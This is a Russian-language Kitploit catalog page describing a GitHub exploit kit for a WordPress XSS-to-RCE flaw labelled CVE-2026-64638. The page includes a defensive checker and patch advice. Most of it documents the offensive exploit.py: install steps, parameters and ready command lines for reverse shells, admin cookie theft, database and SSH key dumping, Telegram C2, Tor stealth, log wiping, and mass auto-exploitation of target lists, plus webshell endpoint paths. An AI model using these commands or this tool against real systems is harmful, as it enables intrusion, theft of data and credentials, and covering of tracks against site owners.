Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-64638-PoC-Exploit — 🛡️ CVE-2026-64638 — Набор для оценки безопасности WordPress (CVSS 8.9) | Инструментарий для пентеста WordPress 4.7.0-7.0.2. Включает оценку уязвимостей и модули расширенного анализа. 🐍 Безопасная проверка и эксплуатация, 2 режима. Расширенный набор для Blue&Red Team Best 2026-64638, только для авторизованного использования. Оставайтесь в рамках закона <3zd | Kitploit
Инструменты/GitHubGitHub/tc4dy/cve-2026-64638-poc-exploit
Повышение привилегийСканеры уязвимостейКриминалистика памятиМеханизмы персистентностиЭксплуатацияЭксплуатация веб-приложенийПост-эксплуатацияТестирование на ПроникновениеКомандование и Управление

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

🛡️ CVE-2026-64638 — Набор для оценки безопасности WordPress (CVSS 8.9) | Инструментарий для пентеста WordPress 4.7.0-7.0.2. Включает оценку уязвимостей и модули расширенного анализа. 🐍 Безопасная проверка и эксплуатация, 2 режима. Расширенный набор для Blue&Red Team Best 2026-64638, только для авторизованного использования. Оставайтесь в рамках закона <3zd

GitHubtc4dy/cve-2026-64638-poc-exploit

CVE-2026-64638-PoC-Exploit

Репозиторий
181 месяц назадЕщё не проверено
Поделиться

CVE PoC

🌀 CVE‑2026‑64638 – WordPress XSS2Shell: комплекс безопасности

Python 3.8+ CVSS Author WordPress

⚠️ ТОЛЬКО ДЛЯ ЭТИЧНОГО ИСПОЛЬЗОВАНИЯ – АВТОРИЗОВАННОЕ ТЕСТИРОВАНИЕ БЕЗОПАСНОСТИ
Данный репозиторий предоставляет инструменты только для авторизованных специалистов по безопасности, blue team и пентестеров.
Несанкционированный доступ к компьютерным системам незаконен согласно CFAA (США), Computer Misuse Act (Великобритания), TCK 243/244 (Турция) и аналогичным законам по всему миру.


📖 Обзор уязвимости

CVE‑2026‑64638 — это критическая отражаемая XSS-уязвимость до аутентификации в ядре WordPress версий с 4.7.0 по 7.0.2, которая позволяет атакующему расширить XSS-атаку до полного удалённого выполнения кода (RCE) через функцию Application Password.

Как это работает

  1. Различие в парсерах – PHP-функция strip_tags() и WordPress-функция wp_kses_post() по-разному разбирают HTML-теги, что позволяет вредоносному вводу пройти санитизацию.
  2. Отражённый XSS – атакующий внедряет специально сформированную полезную нагрузку в форму входа (wp-login.php). При неудачном входе полезная нагрузка отражается обратно и выполняется в браузере жертвы.
  3. Злоупотребление Application Password – внедрённый JavaScript автоматически генерирует Application Password через REST API WordPress и передаёт его атакующему.
  4. Загрузка плагина (RCE) – используя перехваченный Application Password, атакующий авторизуется в админ-панели и загружает вредоносный плагин, содержащий веб-шелл.
  5. Полная компрометация системы – веб-шелл обеспечивает выполнение системных команд, позволяя создавать reverse shell, закрепляться в системе, перемещаться по сети и полностью захватывать сервер.

Затронутые версии

  • WordPress 4.7.0 – 7.0.2 – уязвимы
  • WordPress 7.0.3 и новее – исправлено
  • Обновления безопасности перенесены во все поддерживаемые ветки

Патч

  • Обновитесь до WordPress 7.0.3 или новее.
  • Если обновление невозможно, отключите функцию Application Password в качестве временного решения.

🧰 Инструменты

ИнструментНазначениеЦелевой пользователь
exploit.pyПолный набор средств эксплуатации с reverse shell, закреплением, C2, повышением привилегий, форензикой памяти, дампом базы данных, извлечением SSH-ключей и массовым сканированием.

📊 Сравнение возможностей


🎯 Сводка сценариев использования


⚙️ Установка

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-64638-PoC-Exploit
cd CVE-2026-64638-PoC-Exploit
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3
#ops
pymysql
mysql-connector-python
PySocks
requests[socks]

📋 Параметры

Параметры exploit.py

Параметры safecheck.py


💥 Сценарии


📊 Команды интерактивной оболочки


🧪 Использование эндпоинтов и API

ЭндпоинтНазначение
/wp-login.phpСтраница входа – точка внедрения XSS
/wp-admin/authorize-application.php

🛡️ Ответственное использование

  • Используйте эти инструменты только на системах, которыми вы владеете, или на тестирование которых у вас есть явное письменное разрешение.
  • Несанкционированный доступ незаконен и неэтичен.
  • Авторы не несут ответственности за неправильное использование.
  • Всегда соблюдайте законы и нормативные акты вашей страны.

Данное программное обеспечение предоставляется только в образовательных целях и для авторизованного тестирования безопасности.

Соответствие законодательству

Скачать инструмент
Red team / авторизованные пентестеры
safecheck.pyНеинтрузивный проверщик уязвимостей, который обнаруживает отражение XSS и оценивает уровень безопасности без выполнения вредоносных полезных нагрузок. Формирует подробные отчёты.Blue team / аудиторы безопасности
Возможностьexploit.pysafecheck.py
Обнаружение уязвимости✅✅
Определение версии WordPress✅✅
Обнаружение отражения XSS✅✅
Перехват Application Password✅❌
Загрузка плагина (RCE)✅❌
Reverse shell✅❌
C2-связь (HTTP/DNS/Telegram)✅❌
Повышение привилегий✅❌
Форензика памяти✅❌
Дамп базы данных✅❌
Извлечение SSH-ключей✅❌
Методы закрепления✅❌
Аудит заголовков безопасности❌✅
Проверка раскрытия конфигурационных файлов❌✅
Проверка листинга каталогов❌✅
Проверка раскрытия phpinfo❌✅
Массовое сканирование✅✅
Поддержка прокси✅✅
Поддержка Tor✅✅
Ngrok-туннелирование✅❌
Интерактивная оболочка✅❌
Неинтрузивный (безопасный) режим❌✅
Вывод JSON / отчётов✅✅
СценарийРекомендуемый инструмент
Blue Team – проверка, уязвима ли ваша установка WordPresssafecheck.py
Аудит безопасности – неинтрузивная оценка уязвимостейsafecheck.py
Red Team – авторизованное пентестирование с полной эксплуатациейexploit.py
Bug Bounty – тестирование с ответственным раскрытиемsafecheck.py
Массовое сканирование – проверка нескольких целей на уязвимостьexploit.py или safecheck.py
Реагирование на инциденты – проверка, скомпрометированы ли системыsafecheck.py
Продвинутое пост-эксплуатационное взаимодействие – закрепление, C2, форензикаexploit.py
ПараметрОписание
-t, --targetURL целевого WordPress (например, https://wordpress-site.com)
-l, --listФайл со списком целей (по одной в строке) для массового сканирования
--lhostЛокальный IP-адрес для обратных вызовов reverse shell
--lportЛокальный порт для reverse shell (по умолчанию: 4444)
--proxyHTTP/HTTPS-прокси (например, http://127.0.0.1:8080)
--timeoutТайм-аут запроса в секундах (по умолчанию: 10)
--retryКоличество повторов (по умолчанию: 3)
--threadsКоличество потоков для массового сканирования (по умолчанию: 5)
--exploitАвтоматическая эксплуатация уязвимых целей при массовом сканировании
--ngrok-tokenNgrok authtoken для внешнего туннелирования
--payload-typeТип XSS-полезной нагрузки: reflected, dom_based, waf_bypass, case_manipulation, double_encoded
--session-hijackВключить перехват сессии (кража cookie администратора)
--dump-dbСделать дамп базы данных WordPress (требуется pymysql)
--extract-sshИзвлечь SSH-ключи из целевой системы
--torМаршрутизировать трафик через Tor (socks5h://127.0.0.1:9050)
--stealthВключить скрытый режим (подделка заголовков, задержка запросов)
--no-cleanupПропустить очистку журналов после эксплуатации
--ssl-verifyПроверять SSL-сертификаты
--c2-typeТип C2: http, dns, telegram
--c2-serverURL C2-сервера или токен Telegram-бота
--auto-priv-escАвтоматическое повышение привилегий после получения оболочки
--memory-forensicsВключить модуль форензики памяти
-v, --verboseПодробный вывод
-q, --quietТихий режим (минимальный вывод)
ПараметрОписание
-t, --targetURL целевого WordPress (например, https://wordpress-site.com)
-l, --listФайл со списком целей (по одной в строке) для массового сканирования
--timeoutТайм-аут запроса в секундах (по умолчанию: 10)
--retryКоличество повторов (по умолчанию: 3)
--threadsКоличество потоков для массового сканирования (по умолчанию: 5)
--proxyHTTP/HTTPS-прокси (например, http://127.0.0.1:8080)
--torМаршрутизировать трафик через Tor (socks5h://127.0.0.1:9050)
--ssl-verifyПроверять SSL-сертификаты
--outputВыходной JSON-файл отчёта
-v, --verboseПодробный вывод
-q, --quietТихий режим (минимальный вывод)
#СценарийКоманда
1Быстрая проверка уязвимостиpython safecheck.py -t https://wordpress-site.com
2Детальное сканирование с отчётомpython safecheck.py -t https://wordpress-site.com --output report.json -v
3Полная эксплуатация с reverse shellpython exploit.py -t https://wordpress-site.com --lhost 192.168.1.100 --exploit
4Использование собственной XSS-полезной нагрузкиpython exploit.py -t https://wordpress-site.com --payload-type waf_bypass
5Перехват сессии (кража cookie администратора)python exploit.py -t https://wordpress-site.com --session-hijack
6Дамп базы данных WordPresspython exploit.py -t https://wordpress-site.com --dump-db
7Извлечение SSH-ключейpython exploit.py -t https://wordpress-site.com --extract-ssh
8Использование Tor для анонимностиpython exploit.py -t https://wordpress-site.com --tor --stealth
9C2-связь через Telegrampython exploit.py -t https://wordpress-site.com --c2-type telegram --c2-server "https://api.telegram.org/botTOKEN/chat_id"
10Массовое сканирование из файлаpython exploit.py -l targets.txt --threads 10 --exploit
11Форензика памяти после получения оболочкиpython exploit.py -t https://wordpress-site.com --memory-forensics
12Автоматическое повышение привилегийpython exploit.py -t https://wordpress-site.com --auto-priv-esc
13Интерактивная оболочкаpython exploit.py -t https://wordpress-site.com -i
14Ngrok-туннелированиеpython exploit.py -t https://wordpress-site.com --ngrok-token YOUR_TOKEN
КомандаОписание
reverseЗапустить прослушиватель reverse shell
persistПрименить методы закрепления (cron, systemd, rc.local, SSH, WP)
cleanОчистить системные журналы и историю
dumpdbСделать дамп базы данных WordPress
sshИзвлечь SSH-ключи
privАвтоматическое повышение привилегий
memЗапустить форензику памяти
c2Показать статус C2
c2taskПроверить наличие задач C2
exitВыйти из интерактивной оболочки
Генерация Application Password
/wp-admin/update.php?action=upload-pluginЗагрузка плагина (RCE)
/wp-content/plugins/{slug}/{slug}.phpВыполнение веб-шелла
СтранаСоответствующий закон
СШАComputer Fraud and Abuse Act (CFAA) – 18 U.S.C. § 1030
ВеликобританияComputer Misuse Act 1990
ТурцияTCK 243 (несанкционированный доступ), TCK 244 (вмешательство в систему)
ГерманияStGB § 202a (шпионаж за данными), § 202b (перехват данных)
ФранцияLoi Godfrain – статья 323-1
АвстралияCybercrime Act 2001
КанадаCriminal Code – раздел 342.1
ИндияInformation Technology Act 2000 – разделы 43, 66
ЯпонияAct on Prohibition of Unauthorized Computer Access